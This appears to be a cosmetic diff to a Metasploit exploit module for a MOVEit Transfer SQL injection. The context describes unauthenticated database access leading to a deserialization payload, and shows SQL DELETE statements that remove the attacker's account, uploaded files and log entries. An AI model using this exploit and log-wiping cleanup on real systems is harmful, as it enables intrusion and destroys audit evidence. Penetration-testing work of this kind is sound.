@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'MOVEit SQL Injection vulnerability',
         'Description' => %q{
           This module exploits an SQL injection vulnerability in the MOVEit Transfer web application
-          that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.
+          that allows an unauthenticated attacker to gain access to MOVEit Transfer's database.
           Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an
           attacker can leverage an information leak be able to upload a .NET deserialization payload.
         },
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
     deleteuser_payload = [
       "DELETE FROM moveittransfer.fileuploadinfo WHERE FileID='#{files_json['fileId']}'", # delete the deserialization payload
       "DELETE FROM moveittransfer.files WHERE UploadUsername='#{hax_username}'", # delete the file we uploaded
-      "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'", #
+      "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'",
       "DELETE FROM moveittransfer.users WHERE Username='#{hax_username}'", # delete the user account we created
       "DELETE FROM moveittransfer.log WHERE Username='#{hax_username}'", # The web ASP stuff logs by username
       "DELETE FROM moveittransfer.log WHERE Username='#{hax_loginname}'", # The API logs by loginname
